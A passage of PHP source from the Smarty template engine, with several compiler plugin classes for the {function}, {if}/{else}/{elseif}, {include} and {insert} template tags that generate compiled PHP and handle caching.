	        $compiler->trigger_template_error("Function name contains invalid characters: {$_name}", null, true);
        }

        $compiler->parent_compiler->tpl_function[ $_name ] = array();
        $save = array(
            $_attr, $compiler->parser->current_buffer, $compiler->template->compiled->has_nocache_code,
            $compiler->template->caching
        );
        $this->openTag($compiler, 'function', $save);
        // Init temporary context
        $compiler->parser->current_buffer = new Smarty_Internal_ParseTree_Template();
        $compiler->template->compiled->has_nocache_code = false;
        $compiler->saveRequiredPlugins(true);
        return true;
    }
}

/**
 * Smarty Internal Plugin Compile Functionclose Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Functionclose extends Smarty_Internal_CompileBase
{
    /**
     * Compiler object
     *
     * @var object
     */
    private $compiler = null;

    /**
     * Compiles code for the {/function} tag
     *
     * @param array                                        $args     array with attributes from parser
     * @param object|\Smarty_Internal_TemplateCompilerBase $compiler compiler object
     *
     * @return bool true
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler)
    {
        $this->compiler = $compiler;
        $saved_data = $this->closeTag($compiler, array('function'));
        $_attr = $saved_data[ 0 ];
        $_name = trim($_attr[ 'name' ], '\'"');
        $compiler->parent_compiler->tpl_function[ $_name ][ 'compiled_filepath' ] =
            $compiler->parent_compiler->template->compiled->filepath;
        $compiler->parent_compiler->tpl_function[ $_name ][ 'uid' ] = $compiler->template->source->uid;
        $_parameter = $_attr;
        unset($_parameter[ 'name' ]);
        // default parameter
        $_paramsArray = array();
        foreach ($_parameter as $_key => $_value) {
            if (is_int($_key)) {
                $_paramsArray[] = "$_key=>$_value";
            } else {
                $_paramsArray[] = "'$_key'=>$_value";
            }
        }
        if (!empty($_paramsArray)) {
            $_params = 'array(' . implode(',', $_paramsArray) . ')';
            $_paramsCode = "\$params = array_merge($_params, \$params);\n";
        } else {
            $_paramsCode = '';
        }
        $_functionCode = $compiler->parser->current_buffer;
        // setup buffer for template function code
        $compiler->parser->current_buffer = new Smarty_Internal_ParseTree_Template();
        $_funcName = "smarty_template_function_{$_name}_{$compiler->template->compiled->nocache_hash}";
        $_funcNameCaching = $_funcName . '_nocache';
        if ($compiler->template->compiled->has_nocache_code) {
            $compiler->parent_compiler->tpl_function[ $_name ][ 'call_name_caching' ] = $_funcNameCaching;
            $output = "<?php\n";
            $output .= $compiler->cStyleComment(" {$_funcNameCaching} ") . "\n";
            $output .= "if (!function_exists('{$_funcNameCaching}')) {\n";
            $output .= "function {$_funcNameCaching} (Smarty_Internal_Template \$_smarty_tpl,\$params) {\n";
            $output .= "ob_start();\n";
            $output .= $compiler->compileRequiredPlugins();
            $output .= "\$_smarty_tpl->compiled->has_nocache_code = true;\n";
            $output .= $_paramsCode;
            $output .= "foreach (\$params as \$key => \$value) {\n\$_smarty_tpl->tpl_vars[\$key] = new Smarty_Variable(\$value, \$_smarty_tpl->isRenderingCache);\n}\n";
            $output .= "\$params = var_export(\$params, true);\n";
            $output .= "echo \"/*%%SmartyNocache:{$compiler->template->compiled->nocache_hash}%%*/<?php ";
            $output .= "\\\$_smarty_tpl->smarty->ext->_tplFunction->saveTemplateVariables(\\\$_smarty_tpl, '{$_name}');\nforeach (\$params as \\\$key => \\\$value) {\n\\\$_smarty_tpl->tpl_vars[\\\$key] = new Smarty_Variable(\\\$value, \\\$_smarty_tpl->isRenderingCache);\n}\n?>";
            $output .= "/*/%%SmartyNocache:{$compiler->template->compiled->nocache_hash}%%*/\";?>";
            $compiler->parser->current_buffer->append_subtree(
                $compiler->parser,
                new Smarty_Internal_ParseTree_Tag(
                    $compiler->parser,
                    $output
                )
            );
            $compiler->parser->current_buffer->append_subtree($compiler->parser, $_functionCode);
            $output = "<?php echo \"/*%%SmartyNocache:{$compiler->template->compiled->nocache_hash}%%*/<?php ";
            $output .= "\\\$_smarty_tpl->smarty->ext->_tplFunction->restoreTemplateVariables(\\\$_smarty_tpl, '{$_name}');?>\n";
            $output .= "/*/%%SmartyNocache:{$compiler->template->compiled->nocache_hash}%%*/\";\n?>";
            $output .= "<?php echo str_replace('{$compiler->template->compiled->nocache_hash}', \$_smarty_tpl->compiled->nocache_hash ?? '', ob_get_clean());\n";
            $output .= "}\n}\n";
            $output .= $compiler->cStyleComment("/ {$_funcName}_nocache ") . "\n\n";
            $output .= "?>\n";
            $compiler->parser->current_buffer->append_subtree(
                $compiler->parser,
                new Smarty_Internal_ParseTree_Tag(
                    $compiler->parser,
                    $output
                )
            );
            $_functionCode = new Smarty_Internal_ParseTree_Tag(
                $compiler->parser,
                preg_replace_callback(
                    "/((<\?php )?echo '\/\*%%SmartyNocache:{$compiler->template->compiled->nocache_hash}%%\*\/([\S\s]*?)\/\*\/%%SmartyNocache:{$compiler->template->compiled->nocache_hash}%%\*\/';(\?>\n)?)/",
                    array($this, 'removeNocache'),
                    $_functionCode->to_smarty_php($compiler->parser)
                )
            );
        }
        $compiler->parent_compiler->tpl_function[ $_name ][ 'call_name' ] = $_funcName;
        $output = "<?php\n";
        $output .= $compiler->cStyleComment(" {$_funcName} ") . "\n";
        $output .= "if (!function_exists('{$_funcName}')) {\n";
        $output .= "function {$_funcName}(Smarty_Internal_Template \$_smarty_tpl,\$params) {\n";
        $output .= $_paramsCode;
        $output .= "foreach (\$params as \$key => \$value) {\n\$_smarty_tpl->tpl_vars[\$key] = new Smarty_Variable(\$value, \$_smarty_tpl->isRenderingCache);\n}\n";
        $output .= $compiler->compileCheckPlugins(array_merge($compiler->required_plugins[ 'compiled' ],
            $compiler->required_plugins[ 'nocache' ]));
        $output .= "?>\n";
        $compiler->parser->current_buffer->append_subtree(
            $compiler->parser,
            new Smarty_Internal_ParseTree_Tag(
                $compiler->parser,
                $output
            )
        );
        $compiler->parser->current_buffer->append_subtree($compiler->parser, $_functionCode);
        $output = "<?php\n}}\n";
        $output .= $compiler->cStyleComment("/ {$_funcName} ") . "\n\n";
        $output .= "?>\n";
        $compiler->parser->current_buffer->append_subtree(
            $compiler->parser,
            new Smarty_Internal_ParseTree_Tag(
                $compiler->parser,
                $output
            )
        );
        $compiler->parent_compiler->blockOrFunctionCode .= $compiler->parser->current_buffer->to_smarty_php($compiler->parser);
        // restore old buffer
        $compiler->parser->current_buffer = $saved_data[ 1 ];
        // restore old status
        $compiler->restoreRequiredPlugins();
        $compiler->template->compiled->has_nocache_code = $saved_data[ 2 ];
        $compiler->template->caching = $saved_data[ 3 ];
        return true;
    }

    /**
     * Remove nocache code
     *
     * @param $match
     *
     * @return string
     */
    public function removeNocache($match)
    {
        $code =
            preg_replace(
                "/((<\?php )?echo '\/\*%%SmartyNocache:{$this->compiler->template->compiled->nocache_hash}%%\*\/)|(\/\*\/%%SmartyNocache:{$this->compiler->template->compiled->nocache_hash}%%\*\/';(\?>\n)?)/",
                '',
                $match[ 0 ]
            );
        $code = str_replace(array('\\\'', '\\\\\''), array('\'', '\\\''), $code);
        return $code;
    }
}
<?php
/**
 * Smarty Internal Plugin Compile If
 * Compiles the {if} {else} {elseif} {/if} tags
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile If Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_If extends Smarty_Internal_CompileBase
{
    /**
     * Compiles code for the {if} tag
     *
     * @param array                                 $args      array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler  compiler object
     * @param array                                 $parameter array with compilation parameter
     *
     * @return string compiled code
     * @throws \SmartyCompilerException
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler, $parameter)
    {
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        $this->openTag($compiler, 'if', array(1, $compiler->nocache));
        // must whole block be nocache ?
        $compiler->nocache = $compiler->nocache | $compiler->tag_nocache;
        if (!isset($parameter[ 'if condition' ])) {
            $compiler->trigger_template_error('missing if condition', null, true);
        }
        if (is_array($parameter[ 'if condition' ])) {
            if (is_array($parameter[ 'if condition' ][ 'var' ])) {
                $var = $parameter[ 'if condition' ][ 'var' ][ 'var' ];
            } else {
                $var = $parameter[ 'if condition' ][ 'var' ];
            }
            if ($compiler->nocache) {
                // create nocache var to make it know for further compiling
                $compiler->setNocacheInVariable($var);
            }
            $prefixVar = $compiler->getNewPrefixVariable();
            $_output = "<?php {$prefixVar} = {$parameter[ 'if condition' ][ 'value' ]};?>\n";
            $assignAttr = array();
            $assignAttr[][ 'value' ] = $prefixVar;
            $assignCompiler = new Smarty_Internal_Compile_Assign();
            if (is_array($parameter[ 'if condition' ][ 'var' ])) {
                $assignAttr[][ 'var' ] = $parameter[ 'if condition' ][ 'var' ][ 'var' ];
                $_output .= $assignCompiler->compile(
                    $assignAttr,
                    $compiler,
                    array('smarty_internal_index' => $parameter[ 'if condition' ][ 'var' ][ 'smarty_internal_index' ])
                );
            } else {
                $assignAttr[][ 'var' ] = $parameter[ 'if condition' ][ 'var' ];
                $_output .= $assignCompiler->compile($assignAttr, $compiler, array());
            }
            $_output .= "<?php if ({$prefixVar}) {?>";
            return $_output;
        } else {
            return "<?php if ({$parameter['if condition']}) {?>";
        }
    }
}

/**
 * Smarty Internal Plugin Compile Else Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Else extends Smarty_Internal_CompileBase
{
    /**
     * Compiles code for the {else} tag
     *
     * @param array                                 $args     array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler compiler object
     *
     * @return string compiled code
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler)
    {
        list($nesting, $compiler->tag_nocache) = $this->closeTag($compiler, array('if', 'elseif'));
        $this->openTag($compiler, 'else', array($nesting, $compiler->tag_nocache));
        return '<?php } else { ?>';
    }
}

/**
 * Smarty Internal Plugin Compile ElseIf Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Elseif extends Smarty_Internal_CompileBase
{
    /**
     * Compiles code for the {elseif} tag
     *
     * @param array                                 $args      array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler  compiler object
     * @param array                                 $parameter array with compilation parameter
     *
     * @return string compiled code
     * @throws \SmartyCompilerException
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler, $parameter)
    {
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        list($nesting, $compiler->tag_nocache) = $this->closeTag($compiler, array('if', 'elseif'));
        if (!isset($parameter[ 'if condition' ])) {
            $compiler->trigger_template_error('missing elseif condition', null, true);
        }
        $assignCode = '';
        $var = '';
        if (is_array($parameter[ 'if condition' ])) {
            $condition_by_assign = true;
            if (is_array($parameter[ 'if condition' ][ 'var' ])) {
                $var = $parameter[ 'if condition' ][ 'var' ][ 'var' ];
            } else {
                $var = $parameter[ 'if condition' ][ 'var' ];
            }
            if ($compiler->nocache) {
                // create nocache var to make it know for further compiling
                $compiler->setNocacheInVariable($var);
            }
            $prefixVar = $compiler->getNewPrefixVariable();
            $assignCode = "<?php {$prefixVar} = {$parameter[ 'if condition' ][ 'value' ]};?>\n";
            $assignCompiler = new Smarty_Internal_Compile_Assign();
            $assignAttr = array();
            $assignAttr[][ 'value' ] = $prefixVar;
            if (is_array($parameter[ 'if condition' ][ 'var' ])) {
                $assignAttr[][ 'var' ] = $parameter[ 'if condition' ][ 'var' ][ 'var' ];
                $assignCode .= $assignCompiler->compile(
                    $assignAttr,
                    $compiler,
                    array('smarty_internal_index' => $parameter[ 'if condition' ][ 'var' ][ 'smarty_internal_index' ])
                );
            } else {
                $assignAttr[][ 'var' ] = $parameter[ 'if condition' ][ 'var' ];
                $assignCode .= $assignCompiler->compile($assignAttr, $compiler, array());
            }
        } else {
            $condition_by_assign = false;
        }
        $prefixCode = $compiler->getPrefixCode();
        if (empty($prefixCode)) {
            if ($condition_by_assign) {
                $this->openTag($compiler, 'elseif', array($nesting + 1, $compiler->tag_nocache));
                $_output = $compiler->appendCode("<?php } else {\n?>", $assignCode);
                return $compiler->appendCode($_output, "<?php if ({$prefixVar}) {?>");
            } else {
                $this->openTag($compiler, 'elseif', array($nesting, $compiler->tag_nocache));
                return "<?php } elseif ({$parameter['if condition']}) {?>";
            }
        } else {
            $_output = $compiler->appendCode("<?php } else {\n?>", $prefixCode);
            $this->openTag($compiler, 'elseif', array($nesting + 1, $compiler->tag_nocache));
            if ($condition_by_assign) {
                $_output = $compiler->appendCode($_output, $assignCode);
                return $compiler->appendCode($_output, "<?php if ({$prefixVar}) {?>");
            } else {
                return $compiler->appendCode($_output, "<?php if ({$parameter['if condition']}) {?>");
            }
        }
    }
}

/**
 * Smarty Internal Plugin Compile Ifclose Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Ifclose extends Smarty_Internal_CompileBase
{
    /**
     * Compiles code for the {/if} tag
     *
     * @param array                                 $args     array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler compiler object
     *
     * @return string compiled code
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler)
    {
        // must endblock be nocache?
        if ($compiler->nocache) {
            $compiler->tag_nocache = true;
        }
        list($nesting, $compiler->nocache) = $this->closeTag($compiler, array('if', 'else', 'elseif'));
        $tmp = '';
        for ($i = 0; $i < $nesting; $i++) {
            $tmp .= '}';
        }
        return "<?php {$tmp}?>";
    }
}
<?php
/**
 * Smarty Internal Plugin Compile Include
 * Compiles the {include} tag
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Include Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Include extends Smarty_Internal_CompileBase
{
    /**
     * caching mode to create nocache code but no cache file
     */
    const CACHING_NOCACHE_CODE = 9999;

    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $required_attributes = array('file');

    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $shorttag_order = array('file');

    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $option_flags = array('nocache', 'inline', 'caching');

    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $optional_attributes = array('_any');

    /**
     * Valid scope names
     *
     * @var array
     */
    public $valid_scopes = array(
        'parent' => Smarty::SCOPE_PARENT, 'root' => Smarty::SCOPE_ROOT,
        'global' => Smarty::SCOPE_GLOBAL, 'tpl_root' => Smarty::SCOPE_TPL_ROOT,
        'smarty' => Smarty::SCOPE_SMARTY
    );

    /**
     * Compiles code for the {include} tag
     *
     * @param array                                  $args     array with attributes from parser
     * @param Smarty_Internal_SmartyTemplateCompiler $compiler compiler object
     *
     * @return string
     * @throws \Exception
     * @throws \SmartyCompilerException
     * @throws \SmartyException
     */
    public function compile($args, Smarty_Internal_SmartyTemplateCompiler $compiler)
    {
        $uid = $t_hash = null;
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        $fullResourceName = $source_resource = $_attr[ 'file' ];
        $variable_template = false;
        $cache_tpl = false;
        // parse resource_name
        if (preg_match('/^([\'"])(([A-Za-z0-9_\-]{2,})[:])?(([^$()]+)|(.+))\1$/', $source_resource, $match)) {
            $type = !empty($match[ 3 ]) ? $match[ 3 ] : $compiler->template->smarty->default_resource_type;
            $name = !empty($match[ 5 ]) ? $match[ 5 ] : $match[ 6 ];
            $handler = Smarty_Resource::load($compiler->smarty, $type);
            if ($handler->recompiled || $handler->uncompiled) {
                $variable_template = true;
            }
            if (!$variable_template) {
                if ($type !== 'string') {
                    $fullResourceName = "{$type}:{$name}";
                    $compiled = $compiler->parent_compiler->template->compiled;
                    if (isset($compiled->includes[ $fullResourceName ])) {
                        $compiled->includes[ $fullResourceName ]++;
                        $cache_tpl = true;
                    } else {
                        if ("{$compiler->template->source->type}:{$compiler->template->source->name}" ==
                            $fullResourceName
                        ) {
                            // recursive call of current template
                            $compiled->includes[ $fullResourceName ] = 2;
                            $cache_tpl = true;
                        } else {
                            $compiled->includes[ $fullResourceName ] = 1;
                        }
                    }
                    $fullResourceName = $match[ 1 ] . $fullResourceName . $match[ 1 ];
                }
            }
            if (empty($match[ 5 ])) {
                $variable_template = true;
            }
        } else {
            $variable_template = true;
        }
        // scope setup
        $_scope = $compiler->convertScope($_attr, $this->valid_scopes);
        // set flag to cache subtemplate object when called within loop or template name is variable.
        if ($cache_tpl || $variable_template || $compiler->loopNesting > 0) {
            $_cache_tpl = 'true';
        } else {
            $_cache_tpl = 'false';
        }
        // assume caching is off
        $_caching = Smarty::CACHING_OFF;
        $call_nocache = $compiler->tag_nocache || $compiler->nocache;
        // caching was on and {include} is not in nocache mode
        if ($compiler->template->caching && !$compiler->nocache && !$compiler->tag_nocache) {
            $_caching = self::CACHING_NOCACHE_CODE;
        }
        // flag if included template code should be merged into caller
        $merge_compiled_includes = ($compiler->smarty->merge_compiled_includes || $_attr[ 'inline' ] === true) &&
                                   !$compiler->template->source->handler->recompiled;
        if ($merge_compiled_includes) {
            // variable template name ?
            if ($variable_template) {
                $merge_compiled_includes = false;
            }
            // variable compile_id?
            if (isset($_attr[ 'compile_id' ]) && $compiler->isVariable($_attr[ 'compile_id' ])) {
                $merge_compiled_includes = false;
            }
        }
        /*
        * if the {include} tag provides individual parameter for caching or compile_id
        * the subtemplate must not be included into the common cache file and is treated like
        * a call in nocache mode.
        *
        */
        if ($_attr[ 'nocache' ] !== true && $_attr[ 'caching' ]) {
            $_caching = $_new_caching = (int)$_attr[ 'caching' ];
            $call_nocache = true;
        } else {
            $_new_caching = Smarty::CACHING_LIFETIME_CURRENT;
        }
        if (isset($_attr[ 'cache_lifetime' ])) {
            $_cache_lifetime = $_attr[ 'cache_lifetime' ];
            $call_nocache = true;
            $_caching = $_new_caching;
        } else {
            $_cache_lifetime = '$_smarty_tpl->cache_lifetime';
        }
        if (isset($_attr[ 'cache_id' ])) {
            $_cache_id = $_attr[ 'cache_id' ];
            $call_nocache = true;
            $_caching = $_new_caching;
        } else {
            $_cache_id = '$_smarty_tpl->cache_id';
        }
        if (isset($_attr[ 'compile_id' ])) {
            $_compile_id = $_attr[ 'compile_id' ];
        } else {
            $_compile_id = '$_smarty_tpl->compile_id';
        }
        // if subtemplate will be called in nocache mode do not merge
        if ($compiler->template->caching && $call_nocache) {
            $merge_compiled_includes = false;
        }
        // assign attribute
        if (isset($_attr[ 'assign' ])) {
            // output will be stored in a smarty variable instead of being displayed
            if ($_assign = $compiler->getId($_attr[ 'assign' ])) {
                $_assign = "'{$_assign}'";
                if ($compiler->tag_nocache || $compiler->nocache || $call_nocache) {
                    // create nocache var to make it know for further compiling
                    $compiler->setNocacheInVariable($_attr[ 'assign' ]);
                }
            } else {
                $_assign = $_attr[ 'assign' ];
            }
        }
        $has_compiled_template = false;
        if ($merge_compiled_includes) {
            $c_id = isset($_attr[ 'compile_id' ]) ? $_attr[ 'compile_id' ] : $compiler->template->compile_id;
            // we must observe different compile_id and caching
            $t_hash = sha1($c_id . ($_caching ? '--caching' : '--nocaching'));
            $compiler->smarty->allow_ambiguous_resources = true;
            /* @var Smarty_Internal_Template $tpl */
            $tpl = new $compiler->smarty->template_class(
                trim($fullResourceName, '"\''),
                $compiler->smarty,
                $compiler->template,
                $compiler->template->cache_id,
                $c_id,
                $_caching
            );
            $uid = $tpl->source->type . $tpl->source->uid;
            if (!isset($compiler->parent_compiler->mergedSubTemplatesData[ $uid ][ $t_hash ])) {
                $has_compiled_template = $this->compileInlineTemplate($compiler, $tpl, $t_hash);
            } else {
                $has_compiled_template = true;
            }
            unset($tpl);
        }
        // delete {include} standard attributes
        unset($_attr[ 'file' ], $_attr[ 'assign' ], $_attr[ 'cache_id' ], $_attr[ 'compile_id' ], $_attr[ 'cache_lifetime' ], $_attr[ 'nocache' ], $_attr[ 'caching' ], $_attr[ 'scope' ], $_attr[ 'inline' ]);
        // remaining attributes must be assigned as smarty variable
        $_vars = 'array()';
        if (!empty($_attr)) {
            $_pairs = array();
            // create variables
            foreach ($_attr as $key => $value) {
                $_pairs[] = "'$key'=>$value";
            }
            $_vars = 'array(' . join(',', $_pairs) . ')';
        }
        $update_compile_id = $compiler->template->caching && !$compiler->tag_nocache && !$compiler->nocache &&
                             $_compile_id !== '$_smarty_tpl->compile_id';
        if ($has_compiled_template && !$call_nocache) {
            $_output = "<?php\n";
            if ($update_compile_id) {
                $_output .= $compiler->makeNocacheCode("\$_compile_id_save[] = \$_smarty_tpl->compile_id;\n\$_smarty_tpl->compile_id = {$_compile_id};\n");
            }
            if (!empty($_attr) && $_caching === 9999 && $compiler->template->caching) {
                $_vars_nc = "foreach ($_vars as \$ik => \$iv) {\n";
                $_vars_nc .= "\$_smarty_tpl->tpl_vars[\$ik] =  new Smarty_Variable(\$iv);\n";
                $_vars_nc .= "}\n";
                $_output .= substr($compiler->processNocacheCode('<?php ' . $_vars_nc . "?>\n", true), 6, -3);
            }
            if (isset($_assign)) {
                $_output .= "ob_start();\n";
            }
            $_output .= "\$_smarty_tpl->_subTemplateRender({$fullResourceName}, {$_cache_id}, {$_compile_id}, {$_caching}, {$_cache_lifetime}, {$_vars}, {$_scope}, {$_cache_tpl}, '{$compiler->parent_compiler->mergedSubTemplatesData[$uid][$t_hash]['uid']}', '{$compiler->parent_compiler->mergedSubTemplatesData[$uid][$t_hash]['func']}');\n";
            if (isset($_assign)) {
                $_output .= "\$_smarty_tpl->assign({$_assign}, ob_get_clean());\n";
            }
            if ($update_compile_id) {
                $_output .= $compiler->makeNocacheCode("\$_smarty_tpl->compile_id = array_pop(\$_compile_id_save);\n");
            }
            $_output .= "?>";
            return $_output;
        }
        if ($call_nocache) {
            $compiler->tag_nocache = true;
        }
        $_output = "<?php ";
        if ($update_compile_id) {
            $_output .= "\$_compile_id_save[] = \$_smarty_tpl->compile_id;\n\$_smarty_tpl->compile_id = {$_compile_id};\n";
        }
        // was there an assign attribute
        if (isset($_assign)) {
            $_output .= "ob_start();\n";
        }
        $_output .= "\$_smarty_tpl->_subTemplateRender({$fullResourceName}, $_cache_id, $_compile_id, $_caching, $_cache_lifetime, $_vars, $_scope, {$_cache_tpl});\n";
        if (isset($_assign)) {
            $_output .= "\$_smarty_tpl->assign({$_assign}, ob_get_clean());\n";
        }
        if ($update_compile_id) {
            $_output .= "\$_smarty_tpl->compile_id = array_pop(\$_compile_id_save);\n";
        }
        $_output .= "?>";
        return $_output;
    }

    /**
     * Compile inline sub template
     *
     * @param \Smarty_Internal_SmartyTemplateCompiler $compiler
     * @param \Smarty_Internal_Template               $tpl
     * @param string                                  $t_hash
     *
     * @return bool
     * @throws \Exception
     * @throws \SmartyException
     */
    public function compileInlineTemplate(
        Smarty_Internal_SmartyTemplateCompiler $compiler,
        Smarty_Internal_Template $tpl,
        $t_hash
    ) {
        $uid = $tpl->source->type . $tpl->source->uid;
        if (!($tpl->source->handler->uncompiled) && $tpl->source->exists) {
            $compiler->parent_compiler->mergedSubTemplatesData[ $uid ][ $t_hash ][ 'uid' ] = $tpl->source->uid;
            if (isset($compiler->template->inheritance)) {
                $tpl->inheritance = clone $compiler->template->inheritance;
            }
            $tpl->compiled = new Smarty_Template_Compiled();
            $tpl->compiled->nocache_hash = $compiler->parent_compiler->template->compiled->nocache_hash;
            $tpl->loadCompiler();
            // save unique function name
            $compiler->parent_compiler->mergedSubTemplatesData[ $uid ][ $t_hash ][ 'func' ] =
            $tpl->compiled->unifunc = 'content_' . str_replace(array('.', ','), '_', uniqid('', true));
            // make sure whole chain gets compiled
            $tpl->mustCompile = true;
            $compiler->parent_compiler->mergedSubTemplatesData[ $uid ][ $t_hash ][ 'nocache_hash' ] =
                $tpl->compiled->nocache_hash;
            if ($tpl->source->type === 'file') {
                $sourceInfo = $tpl->source->filepath;
            } else {
                $basename = $tpl->source->handler->getBasename($tpl->source);
                $sourceInfo = $tpl->source->type . ':' .
                              ($basename ? $basename : $tpl->source->name);
            }
            // get compiled code
            $compiled_code = "<?php\n\n";
            $compiled_code .= $compiler->cStyleComment(" Start inline template \"{$sourceInfo}\" =============================") . "\n";
            $compiled_code .= "function {$tpl->compiled->unifunc} (Smarty_Internal_Template \$_smarty_tpl) {\n";
            $compiled_code .= "?>\n" . $tpl->compiler->compileTemplateSource($tpl, null, $compiler->parent_compiler);
            $compiled_code .= "<?php\n";
            $compiled_code .= "}\n?>\n";
            $compiled_code .= $tpl->compiler->postFilter($tpl->compiler->blockOrFunctionCode);
            $compiled_code .= "<?php\n\n";
            $compiled_code .= $compiler->cStyleComment(" End inline template \"{$sourceInfo}\" =============================") . "\n";
            $compiled_code .= '?>';
            unset($tpl->compiler);
            if ($tpl->compiled->has_nocache_code) {
                // replace nocache_hash
                $compiled_code =
                    str_replace(
                        "{$tpl->compiled->nocache_hash}",
                        $compiler->template->compiled->nocache_hash,
                        $compiled_code
                    );
                $compiler->template->compiled->has_nocache_code = true;
            }
            $compiler->parent_compiler->mergedSubTemplatesCode[ $tpl->compiled->unifunc ] = $compiled_code;
            return true;
        } else {
            return false;
        }
    }
}
<?php
/**
 * Smarty Internal Plugin Compile Insert
 * Compiles the {insert} tag
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Insert Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Insert extends Smarty_Internal_CompileBase
{
    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $required_attributes = array('name');

    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $shorttag_order = array('name');

    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $optional_attributes = array('_any');

    /**
     * Compiles code for the {insert} tag
     *
     * @param array                                 $args     array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler compiler object
     *
     * @return string compiled code
     * @throws \SmartyCompilerException
     * @throws \SmartyException
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler)
    {
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        $nocacheParam = $compiler->template->caching && ($compiler->tag_nocache || $compiler->nocache);
        if (!$nocacheParam) {
            // do not compile as nocache code
            $compiler->suppressNocacheProcessing = true;
        }
        $compiler->tag_nocache = true;
        $_smarty_tpl = $compiler->template;
        $_name = null;
        $_script = null;
        $_output = '<?php ';
        // save possible attributes
        eval('$_name = @' . $_attr[ 'name' ] . ';');
        if (isset($_attr[ 'assign' ])) {
            // output will be stored in a smarty variable instead of being displayed
            $_assign = $_attr[ 'assign' ];
            // create variable to make sure that the compiler knows about its nocache status
            $var = trim($_attr[ 'assign' ], '\'');
            if (isset($compiler->template->tpl_vars[ $var ])) {
                $compiler->template->tpl_vars[ $var ]->nocache = true;
            } else {
                $compiler->template->tpl_vars[ $var ] = new Smarty_Variable(null, true);
            }
        }
        if (isset($_attr[ 'script' ])) {
            // script which must be included
            $_function = "smarty_insert_{$_name}";
            $_smarty_tpl = $compiler->template;
            $_filepath = false;
            eval('$_script = @' . $_attr[ 'script' ] . ';');
            if (!isset($compiler->smarty->security_policy) && file_exists($_script)) {
                $_filepath = $_script;
            } else {
                if (isset($compiler->smarty->security_policy)) {
                    $_dir = $compiler->smarty->security_policy->trusted_dir;
                } else {
                    $_dir = null;
                }
                if (!empty($_dir)) {
                    foreach ((array)$_dir as $_script_dir) {
                        $_script_dir = rtrim($_script_dir ?? '', '/\\') . DIRECTORY_SEPARATOR;
                        if (file_exists($_script_dir . $_script)) {
                            $_filepath = $_script_dir . $_script;
                            break;
                        }
                    }
                }
            }
            if ($_filepath === false) {
                $compiler->trigger_template_error("{insert} missing script file '{$_script}'", null, true);
            }
            // code for script file loading
            $_output .= "require_once '{$_filepath}' ;";
            include_once $_filepath;
            if (!is_callable($_function)) {
                $compiler->trigger_template_error(
                    " {insert} function '{$_function}' is not callable in script file '{$_script}'",
                    null,
                    true
                );
            }
        } else {
            $_filepath = 'null';
            $_function = "insert_{$_name}";
            // function in PHP script ?
            if (!is_callable($_function)) {
                // try plugin
                if (!$_function = $compiler->getPlugin($_name, 'insert')) {
                    $compiler->trigger_template_error(
                        "{insert} no function or plugin found for '{$_name}'",
                        null,
                        true
                    );
                }
            }
        }
        // delete {insert} standard attributes
        unset($_attr[ 'name' ], $_attr[ 'assign' ], $_attr[ 'script' ], $_attr[ 'nocache' ]);
        // convert attributes into parameter array string
        $_paramsArray = array();
        foreach ($_attr as $_key => $_value) {
            $_paramsArray[] = "'$_key' => $_value";
        }
        $_params = 'array(' . implode(", ", $_paramsArray) . ')';
        // call insert
        if (isset($_assign)) {
            if ($_smarty_tpl->caching && !$nocacheParam) {
                $_output .= "echo Smarty_Internal_Nocache_Insert::compile ('{$_function}',{$_params}, \$_smarty_tpl, '{$_filepath}',{$_assign});?>";
            } else {
                $_output .= "\$_smarty_tpl->assign({$_assign} , {$_function} ({$_params},\$_smarty_tpl), true);?>";
            }
        } else {
            if ($_smarty_tpl->caching && !$nocacheParam) {
                $_output .= "echo Smarty_Internal_Nocache_Insert::compile ('{$_function}',{$_params}, \$_smarty_tpl, '{$_filepath}');?>";
            } else {
                $_output .= "echo {$_function}({$_params},\$_smarty_tpl);?>";
            }
        }
        $compiler->template->compiled->has_nocache_code = true;
        return $_output;
    }
}
<?php
/**
 * Smarty Internal Plugin Compile Ldelim
 * Compiles the {ldelim} tag
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Ldelim Class
 *
